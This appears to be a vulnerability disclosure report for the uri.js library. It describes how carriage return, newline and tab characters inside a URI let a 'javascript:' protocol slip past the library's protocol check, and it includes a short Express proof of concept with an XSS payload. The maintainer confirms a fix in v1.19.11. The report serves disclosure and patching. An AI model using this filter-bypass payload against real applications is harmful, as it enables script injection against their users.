CRHTLF can lead to invalid protocol extraction potentially leading to XSS in medialize/uri.js
Reported on
Mar 18th 2022
Description
\r, \n, \t characters in the URI can lead to XSS as URI.js will fail to extract javascript: protocol from a URI. See Section 4.4 Step 3 "Remove all ASCII tab or newline from input." of the WHATWG URL spec.
Proof of Concept
const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000
input = "ja\r\nvascript:alert(1)"
url = parse(input)
console.log(url)
app.get('/', (req, res) => {
if (url.protocol !== "javascript:") {res.send("<a href=\'" + input + "\'>CLICK ME!</a>")}
})
app.listen(port, () => {
console.log(`Example app listening on port ${port}`)
})
Run the above and click on the CLICK ME, applications using URI.js to check for javascript: protocol will still be vulnerable to XSS.
Impact
This vulnerability is capable of incorrect protocol extraction potentially leading to XSS.
Occurrences
URI.js L13L53
\r \n \t characters should be removed before parsing
Thank you for reporting the issue. it has been solved and released as v1.19.11
The researcher has requested a CVE here.
Can I go ahead and assign and publish one @maintainer?